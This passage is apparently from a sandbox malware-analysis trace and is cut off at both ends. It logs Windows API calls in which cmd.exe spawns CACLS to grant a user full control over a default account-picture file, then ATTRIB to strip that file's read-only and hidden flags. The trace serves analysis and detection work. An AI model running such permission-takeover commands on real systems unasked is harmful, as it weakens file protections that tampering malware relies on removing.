lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.856] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.856] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0186.856] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0186.856] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0186.856] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0186.856] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0186.856] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0186.856] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0186.856] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0186.856] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f4a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.856] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f4a0, lpFilePart=0x22f49c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f49c*="Desktop") returned 0x18 [0186.856] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.856] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f21c | out: lpFindFileData=0x22f21c) returned 0x2c0ae8 [0186.856] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0186.856] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f21c | out: lpFindFileData=0x22f21c) returned 0x2c0ae8 [0186.857] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0186.857] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f21c | out: lpFindFileData=0x22f21c) returned 0x2c0ae8 [0186.857] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0186.857] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.857] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0186.857] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0186.857] GetEnvironmentStringsW () returned 0x2c0308* [0186.857] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0186.857] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.857] GetConsoleOutputCP () returned 0x1b5 [0186.858] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.858] GetUserDefaultLCID () returned 0x409 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f5e0, cchData=128 | out: lpLCData="0") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f5e0, cchData=128 | out: lpLCData="0") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f5e0, cchData=128 | out: lpLCData="1") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0186.858] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0186.858] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0186.859] GetConsoleTitleW (in: lpConsoleTitle=0x2b09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.859] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.859] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0186.859] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0186.859] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0186.860] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0186.861] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0186.861] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0186.861] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0186.861] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0186.861] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0186.861] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0186.861] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0186.863] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0186.863] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0186.863] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0186.863] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0186.863] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0186.864] _wcsicmp 
(_String1="REM", _String2="ATTRIB") returned 17 [0186.864] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0186.866] GetConsoleTitleW (in: lpConsoleTitle=0x22f274, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.872] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.872] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.872] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.872] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.872] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.872] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.872] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.872] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.872] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.872] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.872] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.872] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.872] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.872] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.872] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.872] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.872] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.872] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.872] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.872] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.872] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.872] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.872] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.872] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.872] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.872] _wcsicmp 
(_String1="CACLS", _String2="VER") returned -19 [0186.872] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.872] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.872] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.872] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.873] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.873] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.873] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.873] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.873] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.873] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.873] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.873] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.873] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.873] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.873] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.873] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.873] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.873] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.873] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.873] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.873] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.873] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.873] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.873] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.873] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.873] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.873] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.873] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.873] 
_wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.873] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.873] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.873] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.873] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.873] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.873] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.873] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.873] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.873] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.873] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.873] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.873] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.873] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.873] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.873] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.873] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.873] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.873] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.873] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.873] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.873] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.873] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.874] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.874] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.874] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.874] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.874] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.874] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 
[0186.874] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.874] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0186.874] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0186.874] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0186.874] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0186.874] SetErrorMode (uMode=0x0) returned 0x0 [0186.874] SetErrorMode (uMode=0x1) returned 0x0 [0186.874] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2c1e98, lpFilePart=0x22ed94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22ed94*="Desktop") returned 0x18 [0186.874] SetErrorMode (uMode=0x0) returned 0x1 [0186.875] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.875] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.880] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.881] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.881] GetLastError () returned 0x2 [0186.881] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.881] GetLastError () returned 0x2 [0186.881] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0x2c2180 [0186.881] FindClose (in: 
hFindFile=0x2c2180 | out: hFindFile=0x2c2180) returned 1 [0186.881] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.883] GetLastError () returned 0x2 [0186.884] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0x2c2180 [0186.884] FindClose (in: hFindFile=0x2c2180 | out: hFindFile=0x2c2180) returned 1 [0186.884] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.884] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.884] GetConsoleTitleW (in: lpConsoleTitle=0x22f008, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.884] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ee90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ef58 | out: lpAttributeList=0x22ee90, lpSize=0x22ef58) returned 1 [0186.884] UpdateProcThreadAttribute (in: lpAttributeList=0x22ee90, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ef50, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ee90, lpPreviousValue=0x0) returned 1 [0186.884] GetStartupInfoW (in: lpStartupInfo=0x22ee4c | out: lpStartupInfo=0x22ee4c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.884] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.885] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 
Pictures\\usertile30.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22eeec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ef38 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x22ef38*(hProcess=0x50, hThread=0x4c, dwProcessId=0x928, dwThreadId=0x45c)) returned 1 [0186.889] CloseHandle (hObject=0x4c) returned 1 [0186.889] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.889] GetEnvironmentStringsW () returned 0x2c0308* [0186.889] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0186.889] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0186.929] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22ee2c | out: lpExitCode=0x22ee2c*=0x0) returned 1 [0186.929] CloseHandle (hObject=0x50) returned 1 [0186.930] _vsnwprintf (in: _Buffer=0x22ef74, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ee38 | out: _Buffer="00000000") returned 8 [0186.930] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.930] GetEnvironmentStringsW () returned 0x2c2410* [0186.930] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0186.930] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.930] GetEnvironmentStringsW () returned 0x2c2410* [0186.930] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0186.930] DeleteProcThreadAttributeList 
(in: lpAttributeList=0x22ee90 | out: lpAttributeList=0x22ee90) [0186.930] GetConsoleTitleW (in: lpConsoleTitle=0x22f274, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.930] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.930] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.931] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.931] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.931] GetLastError () returned 0x2 [0186.931] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.931] GetLastError () returned 0x2 [0186.931] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0x2be4d8 [0186.931] FindClose (in: hFindFile=0x2be4d8 | out: hFindFile=0x2be4d8) returned 1 [0186.931] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0xffffffff [0186.931] GetLastError () returned 0x2 [0186.931] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22eb10, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb10) returned 0x2be4d8 [0186.931] FindClose (in: hFindFile=0x2be4d8 | out: hFindFile=0x2be4d8) returned 1 [0186.932] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.932] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.932] GetConsoleTitleW (in: lpConsoleTitle=0x22f008, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.932] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ee90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ef58 | out: lpAttributeList=0x22ee90, lpSize=0x22ef58) returned 1 [0186.932] UpdateProcThreadAttribute (in: lpAttributeList=0x22ee90, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ef50, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ee90, lpPreviousValue=0x0) returned 1 [0186.932] GetStartupInfoW (in: lpStartupInfo=0x22ee4c | out: lpStartupInfo=0x22ee4c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.932] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.932] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22eeec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ef38 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"", lpProcessInformation=0x22ef38*(hProcess=0x4c, hThread=0x50, dwProcessId=0x978, dwThreadId=0xf78)) returned 1 [0186.934] CloseHandle (hObject=0x50) returned 1 [0186.934] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.934] GetEnvironmentStringsW () returned 0x2c2410* [0186.934] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0186.934] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0186.980] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x22ee2c | out: lpExitCode=0x22ee2c*=0x0) returned 1 [0186.980] CloseHandle (hObject=0x4c) returned 1 [0186.980] _vsnwprintf (in: _Buffer=0x22ef74, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ee38 | out: _Buffer="00000000") returned 8 [0186.980] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.980] GetEnvironmentStringsW () returned 0x2c2410* [0186.981] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0186.981] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.981] GetEnvironmentStringsW () returned 0x2c2410* [0186.981] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0186.981] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ee90 | out: lpAttributeList=0x22ee90) [0186.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.981] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.981] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.981] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.981] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 
[0186.982] SetConsoleInputExeNameW () returned 0x1 [0186.982] GetConsoleOutputCP () returned 0x1b5 [0186.982] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.982] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.982] exit (_Code=0) Process: id = "389" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "388" os_parent_pid = "0xfac" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26918 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26919 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26920 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26921 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 26922 start_va = 0x820000 end_va = 0x828fff entry_point = 0x820000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26923 start_va = 0x77230000 
